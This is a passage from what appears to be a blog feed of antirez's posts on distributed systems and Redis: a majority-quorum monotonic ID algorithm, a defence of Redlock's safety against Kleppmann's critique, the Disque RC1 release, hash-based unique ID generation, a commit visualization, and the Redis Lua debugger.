1. A data store that supports the operation set_if_less_than().

2. A data store that can fsync() data to disk on writes, before replying to the client.

The above includes almost any *SQL server, Redis, and a number of other stores.

We have a set of N nodes, let’s assume N = 5 for simplicity in order to explain the algorithm.
We initialize the system by setting a key called “current” to the value of 0, so in Redis terms, we do:

SET current 0

In all the 5 instances. This is part of the initialization and must be done only when a new “cluster” is initialized. This step could be skipped, but it makes the explanation simpler.

In order to generate a new ID, this is what we do:

1: Get the “current” value from the majority of instances (3 or more if N=5).

2: If we failed to reach 3 instances, GOTO 1.

3: Get the maximum value among the ones we obtained, and increment it by 1. Let’s call this $NEXTID

4: Send the following write operation to all the nodes we are able to reach.

IF current < $NEXTID THEN
    SET current $NEXTID
    return $NEXTID
ELSE
    return NULL
END

5: If 3 or more instances reply $NEXTID, the algorithm succeeded, and we successfully generated a new monotonically increasing ID.

6: Otherwise, if we have not reached the majority, GOTO 1.

What we send at step 4 can be easily translated to a simple Redis Lua script:

local val = tonumber(redis.call('get',KEYS[1]))
local nextid = tonumber(ARGV[1])

if val < nextid then
    redis.call('set',KEYS[1],nextid)
    return nextid
else
    return nil
end
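
To fix the ideas, here is how the whole client-side loop could be sketched in C with hiredis (just a sketch: errors simply count as missing votes, there is no backoff or reconnection, and real code should better contact the nodes in parallel; the nodes[] array is assumed to be already connected with redisConnect() to the 5 instances):

#include <stdlib.h>
#include <hiredis/hiredis.h>

#define NODES 5
#define QUORUM 3 /* Majority with N=5. */

static const char *script =
    "local val = tonumber(redis.call('get',KEYS[1])) "
    "local nextid = tonumber(ARGV[1]) "
    "if val < nextid then "
    "    redis.call('set',KEYS[1],nextid) return nextid "
    "else return nil end";

long long nextId(redisContext **nodes) {
    while (1) {
        /* Steps 1-3: read "current" from a majority, take max+1. */
        long long maxval = 0;
        int votes = 0;
        for (int j = 0; j < NODES; j++) {
            redisReply *r = redisCommand(nodes[j], "GET current");
            if (r && r->type == REDIS_REPLY_STRING) {
                long long v = strtoll(r->str, NULL, 10);
                if (v > maxval) maxval = v;
                votes++;
            }
            if (r) freeReplyObject(r);
        }
        if (votes < QUORUM) continue; /* Step 2: retry. */
        long long nextid = maxval + 1;

        /* Steps 4-5: try to write $NEXTID to a majority. */
        votes = 0;
        for (int j = 0; j < NODES; j++) {
            redisReply *r = redisCommand(nodes[j],
                "EVAL %s 1 current %lld", script, nextid);
            if (r && r->type == REDIS_REPLY_INTEGER &&
                r->integer == nextid) votes++;
            if (r) freeReplyObject(r);
        }
        if (votes >= QUORUM) return nextid;
        /* Step 6: no majority reached, retry from scratch. */
    }
}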

## Is it safe?

The reason why I intuitively believe that it works, other than the fact that, in a modified form, it is used as a step in deeply analyzed algorithms, is that:

If we are able to obtain the majority of “votes”, it is impossible by definition that any other client obtained the majority for an ID greater than or equal to the one we generated. Otherwise there would already be 3 or more instances with a value of current >= $NEXTID, and it would be impossible for us to get the majority. So the IDs generated are always greater than the past IDs, and for the same reason it is impossible for two clients to generate the same ID.

Maybe some kind reader could point to a bug in the algorithm or to an analysis of this algorithm as used in other analyzed systems, however given that the above is adapted to be executed client-side, there are actually more processes involved and it should be re-analyzed in order to provide a proof that it is equivalent.

## Why is it a slow algorithm?

The problem with this algorithm is concurrent access. If many clients are trying to generate new IDs at the same time, nobody may get the majority, and they will need to retry again, with larger numbers. Note that this also means that there could be “holes” in the sequence of generated IDs, so the clients could generate the sequence 1, 2, 6, 10, 11, 21, … because many numbers could be “burned” by the split brain condition caused by concurrent access.

(Note that in the above sentence "split brain" does not mean that there is an inconsistent state between the nodes, just that it was not possible to reach the majority to agree about a given ID. Usually split brain refers to a conflict in the configuration where, for example, multiple nodes claim to be a master. However in the Raft paper the term split brain is used with the same meaning I'm using here).

How many IDs per second you can generate without incurring frequent failures due to concurrent accesses depends on the network RTT and number of concurrent clients. What’s interesting however is that you can make the algorithm more scalable by creating an “IDs server” that talks to the cluster, and mediates the access of the clients by serializing the generation of the new IDs one after the other. This does not create a single point of failure since you don’t need to have a single ID server, you can run a few for redundancy, and have hundreds of clients connecting to it.

Using this schema to generate 5k IDs/sec should be viable, especially if the client is implemented in a smart way, trying to send the requests to the 5 nodes at the same time, using some multiplexing or threaded approach.

Another approach when there are many clients and no node mediating the access is to use randomized and exponential delays to contact the nodes again, if a round of the algorithm failed.

## Why is fsync needed?

Here fsync at every write is mandatory because if nodes go down and restart, they MUST have the latest value of the “current” key. If the value of current goes backward, it is possible to violate our safety property stating that the newly generated IDs are always greater than any other ID generated in the past. However if you use a fully replicated FSM to achieve the same goal, you need fsync anyway (but you don’t have the problem of concurrent accesses: for example using Raft, in normal conditions, you have a single leader you can send requests to).

So, in the case of Redis, it must be configured with AOF enabled and the AOF fsync policy set to always, to make sure the write is always persisted before replying to the client.

## What do I do with those IDs

A set of IDs like that has a property which is called “total ordering”, so such IDs are very useful in different contexts. Usually it is hard with distributed computations to say what happened before and what happened after. Using those IDs you always know the order of certain events.

To give you a simple example: different processes, using this system, may compute a list of items, and take each sub-list in their local storage. At the end, they could merge the multiple lists and get a final list in the right order, as if there was a single shared list since the start where each process was able to append an item.

## Origins of this algorithm

What is described here closely resembles both the first phase of Paxos and the Raft leader election. However it seems just a special case of Lamport timestamps where the majority is used in order to create a total ordering.

Many thanks to Max Neunhoeffer and Martin Kleppmann for feedback about the initial draft of this blog post. Note that any error is mine.
http://antirez.com/news/102
Is Redlock safe? http://antirez.com/news/101 http://antirez.com/news/101 Tue, 09 Feb 2016 15:33:51 +0000
Redlock is a client side distributed locking algorithm I designed to be used with Redis, but the algorithm orchestrates, client side, a set of nodes that implement a data store with certain capabilities, in order to create a multi-master fault tolerant, and hopefully safe, distributed lock with auto release capabilities.
You can implement Redlock using MySQL instead of Redis, for example.

The algorithm's goal was to move people that were using a single Redis instance, or a master-slave setup with failover, in order to implement distributed locks, towards something much more reliable and safe, but having very low complexity and good performance.

Since I published Redlock people implemented it in multiple languages and used it for different purposes.

Martin's analysis of the algorithm concludes that Redlock is not safe. It is great that Martin published an analysis; I asked for an analysis in the original Redlock specification here: http://redis.io/topics/distlock. So thank you Martin. However I don’t agree with the analysis. The good thing is that distributed systems are, unlike other fields of programming, pretty mathematically exact, or they are not, so a given set of properties can be guaranteed by an algorithm, or the algorithm may fail to guarantee them under certain assumptions. In this post I’ll analyze Martin's analysis so that other experts in the field can check the two documents (the analysis and the counter-analysis), and eventually we can understand if Redlock can be considered safe or not.

Why Martin thinks Redlock is unsafe
-----------------------------------

The arguments in the analysis are mainly two:

1. Distributed locks with an auto-release feature (the mutually exclusive lock property is only valid for a fixed amount of time after the lock is acquired) require a way to avoid issues when clients use a lock after the expire time, violating the mutual exclusion while accessing a shared resource. Martin says that Redlock does not have such a mechanism.

2. Martin says the algorithm is, regardless of problem “1”, inherently unsafe since it makes assumptions about the system model that cannot be guaranteed in practical systems.

I’ll address the two concerns separately for clarity, starting with the first “1”.

Distributed locks, auto release, and tokens
-------------------------------------------

A distributed lock without an auto release mechanism, where the lock owner will hold it indefinitely, is basically useless. If the client holding the lock crashes and does not recover with full state in a short amount of time, a deadlock is created where the shared resource that the distributed lock tried to protect remains forever inaccessible. This creates a liveness issue that is unacceptable in most situations, so a sane distributed lock must be able to auto release itself.

So practical locks are provided to clients with a maximum time to live. After the expire time, the mutual exclusion guarantee, which is the *main* property of the lock, is gone: another client may already have the lock. What happens if two clients acquire the lock at two different times, but the first one is so slow, because of GC pauses or other scheduling issues, that it ends up trying to do work on the shared resource at the same time as the second client that acquired the lock?

Martin says that this problem is avoided by having the distributed lock server provide, with every lock, a token, which is, in his example, just a number that is guaranteed to always increment. The rationale for Martin's usage of a token is that, when two different clients access the locked resource at the same time, we can use the token in the database write transaction (which is assumed to materialize the work the client does): only the client with the greatest lock number will be able to write to the database.

In Martin's words:

“The fix for this problem is actually pretty simple: you need to include a fencing token with every write request to the storage service. In this context, a fencing token is simply a number that increases (e.g. incremented by the lock service) every time a client acquires the lock”

… snip …

“Note this requires the storage server to take an active role in checking tokens, and rejecting any writes on which the token has gone backwards”.

I think this argument has a number of issues:

1. Most of the time, when you need a distributed lock system that can guarantee mutual exclusivity, when this property is violated you already lost. Distributed locks are very useful exactly when we have no other control over the shared resource. In his analysis, Martin assumes that you always have some other way to avoid race conditions when the mutual exclusivity of the lock is violated. I think this is a very strange way to reason about distributed locks with strong guarantees; it is not clear why you would use a lock with strong properties at all if you can resolve races in a different way. Yet I’ll continue with the other points below just for the sake of showing that Redlock can work well even in this very artificial context.

2. If your data store can always accept the write only if your token is greater than all the past tokens, then it’s a linearizable store. If you have a linearizable store, you can just generate an incremental ID for each Redlock acquired, which would make Redlock equivalent to any other distributed lock system that provides an incremental token ID with every new lock. However in the next point I’ll show how this is not needed.

3. However “2” is not a sensible choice anyway: most of the time the result of working on a shared resource is not a write to a linearizable store, so what to do? Each Redlock is associated with a large random token (which is generated in a way that collisions can be ignored; the Redlock specification assumes, textually, “20 bytes from /dev/urandom”). What do you do with a unique token? For example you can implement Check and Set: when starting to work with a shared resource, we set its state to the lock token, then we perform the read-modify-write only if the token is still the same when we write (see the sketch after this list).

4. Note that in certain use cases, one could say, it’s useful anyway to have ordered tokens. While it’s hard to think of a use case, note that because of the same GC pauses Martin mentions, the order in which the tokens were acquired does not necessarily respect the order in which the clients will attempt to work on the shared resource, so the lock order may not be causally related to the effects of working on the shared resource.

5. Most of the time, locks are used to access resources that are updated in a non-transactional way. Sometimes we use distributed locks to move physical objects, for example. Or to interact with another external API, and so forth.
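
Here is a minimal sketch of the Check and Set idea mentioned in point “3”, using redis-py and a small Lua script for atomicity. The key name and the helper function are mine, and this assumes the final result of the work is itself a Redis write; it is an illustration, not part of the Redlock specification:

import redis

r = redis.Redis()

# Runs atomically server side: the state is updated only if it still
# holds the token of the lock we acquired when we started working.
CAS_SCRIPT = """
if redis.call('get', KEYS[1]) == ARGV[1] then
    return redis.call('set', KEYS[1], ARGV[2])
else
    return false
end
"""

def checked_write(state_key, our_token, new_value):
    # Returns OK if our token was still in place, nil (None) otherwise.
    return r.eval(CAS_SCRIPT, 1, state_key, our_token, new_value)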

I want to mention again that what is strange about all this is the assumption that you must always have a way to handle the fact that mutual exclusion is violated. Actually, if you have such a system to avoid problems during race conditions, you probably don’t need a distributed lock at all, or at least you don’t need a lock with strong guarantees, but just a weak lock to avoid, most of the time, concurrent accesses for performance reasons.

However even if you happen to agree with Martin that the above is very useful, the bottom line is that a unique identifier for each lock can be used for the same goals, while being much more practical in terms of not requiring strong guarantees from the store.

Let’s talk about system models
------------------------------

The above criticism applies to basically every distributed lock with auto release that does not provide a monotonically increasing counter with each lock. However the other critique of Martin is specific to Redlock. Here Martin really analyzes the algorithm, concluding it is broken.

Redlock assumes a semi-synchronous system model where different processes can count time at more or less the same “speed”. The different processes don’t need in any way to have a bounded error in the absolute time. What they need to do is just, for example, to be able to count 5 seconds with a maximum of 10% error. So one counts an actual 4.5 seconds, another 5.5 seconds, and we are fine.

Martin also states that Redlock requires bounded maximum message delays, which is not correct as far as I can tell (I’ll explain later what’s the problem with his reasoning).

So let’s start with the issue of different processes being unable to count time at the same rate.

Martin says that the clock can randomly jump in a system because of two issues:

1. The system administrator manually alters the clock.

2. The ntpd daemon changes the clock a lot because it receives an update.

The above two problems can be avoided, for “1”, by simply not doing this (otherwise even corrupting a Raft log with “echo foo > /my/raft/log.bin” is a problem), and for “2”, by using an ntpd that does not change the time by jumping directly, but by distributing the change over the course of a larger time span.

However I think Martin is right that Redis and Redlock implementations should switch to the monotonic time API provided by most operating systems, in order to make the above issues less of a problem. This was proposed several times in the past, adds a bit of complexity inside Redis, but is a good idea: I’ll implement it in the next weeks. However, while we’ll switch to the monotonic time API because there are advantages, processes running in an operating system without software (time server) or human (system administrator) elements altering the clock *can* count relative time with a bounded error even with gettimeofday().
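
To make the distinction concrete, here is a trivial Python illustration (not Redis code) of relative time measured with the monotonic API versus the wall clock:

import time

t0 = time.monotonic()   # monotonic clock: ntpd and sysadmins cannot move it
# ... acquire the lock, do some work ...
elapsed = time.monotonic() - t0   # relative time, subject only to bounded drift
print(elapsed)

wall = time.time()      # wall clock: may jump backward or forward at any moment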

Note that there have been past attempts to implement distributed systems even assuming a bounded absolute time error (by using GPS units). Redlock does not require anything like that, just the ability of different processes to count 10 seconds as 9.5 or 11.2 (+/- 2 seconds max in the example), for instance.

So is Redlock safe or not? It depends on the above. Let’s assume we use the monotonically increasing time API, for the sake of simplicity, to rule out implementation details (system administrators with a love for POKE, and time servers). Can a process count relative time with a fixed maximum percentage of error? I think the answer is a resounding YES, and it is simpler to answer yes to this than to “can a process write a log without corrupting it?”

Network delays & co
-------------------

Martin says that Redlock does not just depend on the fact that processes can count time at approximately the same rate. He says:

“However, Redlock is not like this. Its safety depends on a lot of timing assumptions: it assumes that all Redis nodes hold keys for approximately the right length of time before expiring; that the network delay is small compared to the expiry duration; and that process pauses are much shorter than the expiry duration.”

So let’s split the above claims into different parts:

1. Redis nodes hold keys for approximately the right length of time.

2. Network delays are small compared to the expiry duration.

3. Process pauses are much shorter than the expiry duration.

Wherever Martin says that “the system clock jumps”, I assume that we covered this by not poking with the system time in a way that is a problem for the algorithm, or, for the sake of simplicity, by using the monotonic time API. So:

About claim 1: This is not an issue, we assumed that we can count time approximately at the same speed, unless there is any actual argument against it.

About claim 2: Things are a bit more complex. Martin says:

“Okay, so maybe you think that a clock jump is unrealistic, because you’re very confident in having correctly configured NTP to only ever slew the clock.” (Yep we agree here ;-) he continues and says…)

“In that case, let’s look at an example of how a process pause may cause the algorithm to fail:
Client 1 requests lock on nodes A, B, C, D, E.
While the responses to client 1 are in flight, client 1 goes into stop-the-world GC.
Locks expire on all Redis nodes.
Client 2 acquires lock on nodes A, B, C, D, E.
Client 1 finishes GC, and receives the responses from Redis nodes indicating that it successfully acquired the lock (they were held in client 1’s kernel network buffers while the process was paused).
Clients 1 and 2 now both believe they hold the lock.”

If you read the Redlock specification, which I haven't touched for months, you can see the steps to acquire the lock are:

1. Get the current time.

2. … All the steps needed to acquire the lock …

3. Get the current time, again.

4. Check if we are already out of time, or if we acquired the lock fast enough.

5. Do some work with your lock.

Note steps 1 and 3. Whatever delay happens in the network or in the processes involved, after acquiring the majority we *check again* that we are not out of time. The delay can only happen after step 3, resulting in the lock being considered valid while it is actually expired; that is, we are back at the first problem Martin identified, where the client fails to stop working on the shared resource before the lock validity expires. Let me repeat how this problem is common to *all the distributed lock implementations*, and how the token as a solution is both unrealistic and usable with Redlock as well.

Note that whatever happens between 1 and 3, you can add whatever network delays you want: the lock will always be considered not valid if too much time elapsed, so Redlock looks completely immune from messages that have unbounded delays between processes. It was designed with this goal in mind, and I cannot see how the above race condition could happen.
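
To make steps 1-4 concrete, here is a minimal sketch in Python. It assumes node clients with a redis-py style set(..., nx=True, px=...) primitive, and a hypothetical drift factor; releasing the nodes on failure is omitted, so refer to the Redlock specification for the complete algorithm:

import time

def acquire(nodes, resource, token, ttl_ms, drift_factor=0.01):
    start = time.monotonic()                        # step 1: get the time
    votes = sum(1 for n in nodes                    # step 2: try all nodes
                if n.set(resource, token, nx=True, px=ttl_ms))
    elapsed_ms = (time.monotonic() - start) * 1000  # step 3: time, again
    validity_ms = ttl_ms - elapsed_ms - ttl_ms * drift_factor
    # Step 4: did we reach the majority while still within the lock TTL?
    if votes >= len(nodes) // 2 + 1 and validity_ms > 0:
        return validity_ms   # how long the lock can be trusted, at most
    return None              # failed: the caller should unlock and retry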

Yet Martin's blog post was also reviewed by multiple DS experts, so I’m not sure whether I’m missing something here, or whether the way Redlock works was simply overlooked by many at the same time. I’ll be happy to receive some clarification about this.

The above also addresses “process pauses”, concern number 3. Pauses during the process of acquiring the lock don’t have effects on the algorithm's correctness. They can, however, affect the ability of a client to complete its work within the specified lock time to live, as with any other distributed lock with auto release, as already covered above.

Digression about network delays
---

Just a quick note. In server-side implementations of a distributed lock with auto-release, the client may ask to acquire a lock, the server may allow the client to do so, but the process can stop into a GC pause or the network may be slow or whatever, so the client may receive the "OK, the lock is yours" too late, when the lock is already expired. However you can do a lot to avoid your process sleeping for a long time, and you can't do much to avoid network delays, so the steps of checking the time before and after the lock is acquired, to see how much time is left, should actually be common practice even when using other systems implementing locks with an expiry.

Fsync or not?
-------------

At some point Martin talks about the fact that Redlock uses delayed restarts of nodes. This requires, again, the ability to wait more or less a specified amount of time, as covered above; no need to repeat the same things again.

However what is important about this is that this step is optional. You could configure each Redis node to fsync at every operation, so that when the client receives the reply, it knows the lock was already persisted on disk. This is how most other systems providing strong guarantees work. The very interesting thing about Redlock is that you can opt out of any disk involvement at all by implementing delayed restarts. This means it’s possible to process hundreds of thousands of locks per second with a few Redis instances, which is something impossible to obtain with other systems.
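
For reference, the redis.conf settings involved in the fsync-at-every-operation setup would be something like this (a sketch):

appendonly yes        # log every write to the AOF
appendfsync always    # fsync before replying: the lock reaches the disk
                      # before the client ever sees the OK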

GPS units versus the local computer clock
-----------------------------------------

Returning to the system model, one thing that makes the Redlock system model practical is that you can assume a process is never partitioned away from the system clock. Note that this is different compared to other semi-synchronous models where GPS units are used, because there are two non-obvious partitions that may happen in that case:

1. The GPS is partitioned away from the GPS network, so it can’t acquire a fix.

2. The process and the GPS are not able to exchange messages or there are delays in the messages exchanged.

The above problems may result in a liveness or safety violation depending on how the system is orchestrated (safety issues only happen if there is a design error, for example if the GPS updates the system time asynchronously so that, when the GPS does not work, the absolute time error may go over the maximum bound).

The Redlock system model does not have these complexities, nor does it require additional hardware: just the computer clock, and even a very cheap clock will do, with all the obvious biases due to the crystal temperature and other things influencing its precision.

Conclusions
-----------

I think Martin has a point about the monotonic API: Redis and Redlock implementations should use it to avoid issues due to the system clock being altered. However I can’t identify other points of the analysis affecting Redlock safety, as explained above, nor do I find justified his final conclusion that people should not use Redlock when the mutual exclusion guarantee is needed.

It would be great to both receive more feedback from experts and to test the algorithm with Jepsen, or similar tools, to accumulate more data.

A big thank you to the friends of mine who helped me review this post.
http://antirez.com/news/101
Disque 1.0 RC1 is out! http://antirez.com/news/100 http://antirez.com/news/100 Sat, 02 Jan 2016 15:26:07 +0000
If you don't know what Disque is, the best starting point is to read the README in the Github project page at http://github.com/antirez/disque.

Disque is just a piece of software, so it has a material value which can be zero or more, depending on its ability to do useful things for the people using it. But for me there is a huge value that goes beyond what Disque, materially, is. It is the value of designing and building something you care about. It’s the magic of programming: where there was nothing, now there is something that works, that other people may potentially analyze, run, use.

Distributed systems are a beautiful field. Thanks to Redis, and to the people that tried to mentor me in a way or another, I got exposed to distributed systems. I wanted to translate this love into something tangible. A new, small system, designed from scratch, without prejudices and without looking too closely at what other similar systems were doing. The experience with Redis showed me that message brokers are a very interesting topic, and that in some way they are the perfect topic to apply DS concepts to. I even claim message brokers can be fun and exciting. So I tried to design a new message queue, and Disque is the result.

Disque's design goal is to provide a system with a good user experience: to provide certain guarantees in the context of messaging, guarantees which are easy to reason about, and to provide extreme operational simplicity. The RC1 offers the foundation, but there is more work to do. For once I hope that Disque will be tested by Aphyr with Jepsen in depth. Since Disque is a system that provides certain kinds of guarantees that can be tested, if it fails certain tests, this translates directly into some bug to fix, which means ending up with a better system.

On the operational side, it remains to be tested in the real world. AP and message queues are IMHO a perfect match to provide operational robustness. However I’m not living under the illusion that I got everything right in the first release, so it will take months (or years?) of iteration to *really* reach the operational simplicity I’m targeting. Moreover this is an RC1 that was heavily modified in the latest weeks, so I expect it to have a non-trivial amount of bugs.

From the point of view of making a fun and exciting system, I tried to end up with a simple and small API that does not force users to think about the details of *this specific* implementation, but more generally about the messaging problem they have. Disque also has a set of introspection capabilities that should help make it a non-opaque system that is actually possible to debug and observe.

Even with all the limits of new code and ideas, the RC release is a great first step, and I’m glad Disque is not in the list of side projects that we programmers start and never complete.

I was not alone during the past months, while hacking with Disque and trying to figure out how to shape it, I received the help of: He Sun, Damian Janowski, Josiah Carlson, Michel Martens, Jacques Chester, Kyle Kingsbury, Mark Paluch, Philipp Krenn, Justin Case, Nathan Fritz, Marcos Nils, Jasper Louis Andersen, Vojtech Vitek, Renato C., Sebastian Waisbrot, Redis Labs and Pivotal, and probably more people I’m not remembering right now. Thank you for your help.

The RC1 is tagged in the Disque Github repository. Have fun!
http://antirez.com/news/100
Generating unique IDs: an easy and reliable way http://antirez.com/news/99 http://antirez.com/news/99 Sat, 21 Nov 2015 14:47:01 +0000
The post was one of the top news on Hacker News today. It’s pretty clear and informative from the point of view of how Math.random() is broken and how it should be fixed, so I’ve nothing to add to the matter itself. But since the author discovered the weakness of the PRNG in the context of generating large, probably-non-colliding IDs, I want to share with you an alternative that I used multiple times in the past, which is fast and extremely reliable.

The problem of unique IDs
- - -

So, in theory, if you want to generate unique IDs you need to store some state that makes sure an ID is never repeated. In the trivial case you may use just a simple counter. However the last ID generated must be stored in a consistent way. In case of a restart of the system, it should never happen that the same ID is generated again because our stored counter was not correctly persisted on disk.

If we want to generate unique IDs using multiple processes, each process needs to make sure to prepend its IDs with some process-specific prefix that will never collide with another process' prefix. This can be complex to manage as well. The simple fact of having to store the previous ID in a reliable way is very time consuming when we want to generate a high number of IDs per second.

Fortunately there is a simple solution: generate a random number in a range between 0 and N, with N so big that the probability of collisions is small enough to be, for every practical application, irrelevant.
This works if the numbers we generate are uniformly distributed between 0 and N. If this prerequisite holds, we can use the birthday paradox in order to calculate the probability of collisions.

By using enough bits it’s trivial to make the probability of a collision billions of times less likely than an asteroid hitting the Earth, even if we generate millions of IDs per second for hundreds of years.
If this is not enough margin for you, just add more bits: you can easily reach an ID space larger than the number of atoms in the universe.
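
To put numbers on this, here is a quick back-of-the-envelope computation using the standard birthday bound approximation (the workload figures are just an example):

import math

def collision_probability(n_ids, bits):
    # Birthday bound approximation: p ~ 1 - e^(-n^2 / 2N).
    # expm1 keeps precision when the probability is tiny.
    N = 2 ** bits
    return -math.expm1(-(n_ids ** 2) / (2 * N))

# One million IDs per second, for one hundred years, with 160-bit IDs:
n = 10**6 * 3600 * 24 * 365 * 100
print(collision_probability(n, 160))   # about 3.4e-18: negligible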

This generation method has a great advantage: it is completely stateless. Multiple nodes can generate IDs at the same time without exchanging messages. Moreover there is nothing to store on disk, so we can go as fast as our CPU can go, and the computation will easily fit in the CPU cache. So it’s terribly fast and convenient.

Mike Malone was using this idea, employing the PRNG in order to create an ID composed of a set of characters, where each character was one of 64 possible characters. In order to create each character the weak V8 PRNG was used, resulting in collisions. Remember that our initial assumption is that each new ID must be selected uniformly in the space between 0 and N.

You can fix this problem by using a stronger PRNG, but this requires an analysis of the PRNG. Another problem is seeding: how do you start the process again after a restart, making sure you don’t pick the initial state of the PRNG again? Otherwise your real ID space is limited by the seeding of the PRNG, not by the output space itself.

For all the above reasons I want to show you a trivial technique that avoids most of these problems.

Using a crypto hash function to generate unique IDs
- - -

Cryptographic hash functions are non-invertible functions that transform a sequence of bits into a fixed-length sequence of bits. They are designed in order to resist a variety of attacks; however, in this application we only rely on a given characteristic they have: uniformity of output. Changing a bit in the input of the hash function will cause each bit of the output to change with 50% probability.

In order to have a reliable seed, we get some help from the operating system by querying /dev/urandom. Seeding the generator is the moment where we really want some external entropy, otherwise we risk making a huge mistake and generating the same sequence again.

As an example of a crypto hash function we'll use the well known SHA1, which has an output of 160 bits. Note that you could even use MD5 for this application: its known vulnerabilities have no impact on our usage here.

We start by creating a seed, reading 160 bits from /dev/urandom. In pseudocode it will be something like:

seed = devurandom.read(160/8)

We also initialize a counter:

counter = 0

Now this is the function that will generate every new ID:

function get_new_id()
    myid = SHA1(string(counter) + seed)
    counter = counter + 1
    return myid
end

Basically we have a fixed string, which is our seed, and we hash it with a progressive counter, so if our seed is “foo”, we output new IDs as:

SHA1(“0foo”)
SHA1(“1foo”)
SHA1(“2foo”)

This is already good for our use case. However we may also want our IDs to be hard to predict. In order to make the IDs very hard to predict, just use SHA1_HMAC() in place of SHA1 in the get_new_id() function, where the seed is the secret and the counter is the message of the HMAC.
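
Translating the pseudocode into runnable Python is straightforward; this is a minimal sketch using the standard library (the function names are mine):

import hashlib, hmac, os

seed = os.urandom(20)   # 160 bits of initial entropy from the OS
counter = 0

def get_new_id():
    # Hash the seed together with a progressive counter: the uniform
    # output makes collisions as unlikely as the birthday bound predicts.
    global counter
    new_id = hashlib.sha1(str(counter).encode() + seed).hexdigest()
    counter += 1
    return new_id

def get_new_unpredictable_id():
    # Same idea with HMAC: the seed is the secret, the counter is the
    # message, so the IDs are also hard to predict.
    global counter
    new_id = hmac.new(seed, str(counter).encode(), hashlib.sha1).hexdigest()
    counter += 1
    return new_id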

This method is fast, has guaranteed good distribution, so collisions will be as rare as predicted by the birthday paradox, there is no analysis needed on the PRNG, and it is completely stateless.

I use it on my Disque project in order to generate message IDs among multiple nodes in a distributed system.

Hacker News thread here: https://news.ycombinator.com/item?id=10606910
http://antirez.com/news/99
6 years of commit visualized http://antirez.com/news/98 http://antirez.com/news/98 Fri, 20 Nov 2015 10:58:34 +0000
Full size image here: http://antirez.com/misc/commitsvis.png


Each commit is a rectangle. The height is the number of affected lines (a logarithmic scale is used). The gray labels show release tags.

There are few surprises, since the amount of commits remained pretty much the same over time. However, now that we no longer backport features into 3.0 and stable releases in general, the rate at which new patchlevel versions are released has diminished.

Major releases look more or less evenly spaced between 2.6, 2.8 and 3.0, but were more frequent initially, something that should change soon as we are trying to switch to time-driven releases, with 3 new major releases each year (each obviously containing fewer new things compared to the amount of stuff present in major releases that took one whole year).
For example the 3.2 RC is due for December 2015.

Patch releases of a given major release tend to have a logarithmic curve shape. As a release matures, in general it gets fewer critical bugs. Also, attention shifts progressively to the new release.

I would love Github to give us stuff like this and much more. There is a lot of data in the commit history of a project that has been around for years. This data should be analyzed and explored... it's a shame that the graphics section has apparently been the same thing for years.

EDIT: The Tcl script used to generate this graph is here: https://github.com/antirez/redis/tree/unstable/utils/graphs/commits-over-time
http://antirez.com/news/98
Recent improvements to Redis Lua scripting http://antirez.com/news/97 http://antirez.com/news/97 Thu, 19 Nov 2015 11:23:27 +0000
1. A proper debugger for Redis Lua scripts.
2. Replication, and storage on the AOF, of Lua scripts as a set of write commands materializing the *effects* of the script, instead of replicating the script itself as we normally do.

The second feature is not just a matter of how scripts are replicated, but also touches what you can do with Lua scripting as we will see later.

Back from London, I implemented both the features. This blog post describes both, giving a few hints about the design and implementation aspects that may be interesting for the readers.

A proper Lua debugger
---

Lua scripting was initially conceived in order to write really trivial scripts. Things like: if the key exists, do this. A couple of lines in order to avoid bloating Redis with all the possible variations of commands. Of course users did a lot more with it, and started to write complex scripts: from quad-tree implementations to full featured messaging systems with non-trivial semantics. Lua scripting makes Redis programmable, and programmers usually can’t resist programmable things. It helps that all the Lua scripts run using the same interpreter and are cached, so they are very fast. It is most of the time possible to do a lot more with a Redis instance by using Lua scripting, both functionally and in terms of operations per second. So complex scripts totally have their place today. We went from a very cold reception of the scripting feature (something as dynamic as a script sent to a database!), to mass usage, to complex scripts, in a matter of a few years.

However writing simple scripts and writing complex scripts is a completely different matter. Bigger programs become exponentially more complex, and you can feel this even when going from 10 to 200 lines of code. While you can debug by brute force any simple script, just trying a few variants and observing the effects on the data set, or putting a few logging instructions in the middle, with complex scripts you have a bad time without a debugger.

My colleague Itamar Haber spent a lot of his time writing complex scripts recently. At some point he also wrote some kind of debugger for Redis Lua scripting using the Lua debug library. That debugger no longer works, since the debug library is no longer exposed to scripts for sandboxing concerns; and in general, what you want in a Redis debugger is an interactive, remote debugger, with a proper client able to work alongside the server, to provide a good debugging experience. Debugging is already a lot of hard work, so having solid tools is really a must. The only way to accomplish this was to add proper debugging support inside Redis itself.

So back from London, Itamar and I started to talk about what a debugger should offer to the user in order to be really useful, and a real upgrade compared to the past. We also discussed just adding support for the Lua debuggers that already exist outside the Redis ecosystem. However I strongly believe the user experience is enhanced when everything is designed specifically to work well with Redis, so in the end I decided to write the debugger from scratch. A few things were sure: we needed a remote debugger where you could attach to Redis, start a debugging session, and have good observability of what the script was doing with the Redis dataset. A special concern of mine was to have colorized output, of course ;-) I wanted to make debugging a fun experience, with a very fast learning curve, which are related things.

Now, showing how a debugger works by writing a blog post about it is surely possible, but even a purist like me, writing articles in Courier, will resort to a video from time to time. So here is a longish video showing the main features of the Redis debugger. I start talking like I'm a bit depressed since this was early in the morning, but after a few minutes the coffee kicks in and you’ll see me happier.

(Hint: watch the video in full screen to have an acceptable font size for the interactive session. The video quality is high enough to make it readable.)

[Embedded video: a tour of the Redis Lua debugger]

If you are not into playing videos, a short recap of what you can do with the Lua debugger is provided by the debugger help screen itself:

$ ./redis-cli --ldb --eval /tmp/script.lua
Lua debugging session started, please use:
quit -- End the session.
restart -- Restart the script in debug mode again.
help -- Show Lua script debugging commands.

* Stopped at 1, stop reason = step over
-> 1 local src = KEYS[1]
lua debugger> help
Redis Lua debugger help:
[h]elp               Show this help.
[s]tep               Run current line and stop again.
[n]ext               Alias for step.
[c]continue          Run till next breakpoint.
[l]list              List source code around current line.
[l]list [line]       List source code around [line].
                     line = 0 means: current position.
[l]list [line] [ctx] In this form [ctx] specifies how many lines
                     to show before/after [line].
[w]hole              List all source code. Alias for 'list 1 1000000'.
[p]rint              Show all the local variables.
[p]rint <var>        Show the value of the specified variable.
                     Can also show global vars KEYS and ARGV.
[b]reak              Show all breakpoints.
[b]reak <line>       Add a breakpoint to the specified line.
[b]reak -<line>      Remove breakpoint from the specified line.
[b]reak 0            Remove all breakpoints.
[t]race              Show a backtrace.
[e]eval <code>       Execute some Lua code (in a different callframe).
[r]edis <cmd>        Execute a Redis command.
[m]axlen [len]       Trim logged Redis replies and Lua var dumps to len.
                     Specifying zero as <len> means unlimited.
[a]abort             Stop the execution of the script. In sync
                     mode dataset changes will be retained.

Debugger functions you can call from Lua scripts:
redis.debug()        Produce logs in the debugger console.
redis.breakpoint()   Stop execution like if there was a breakpoint in
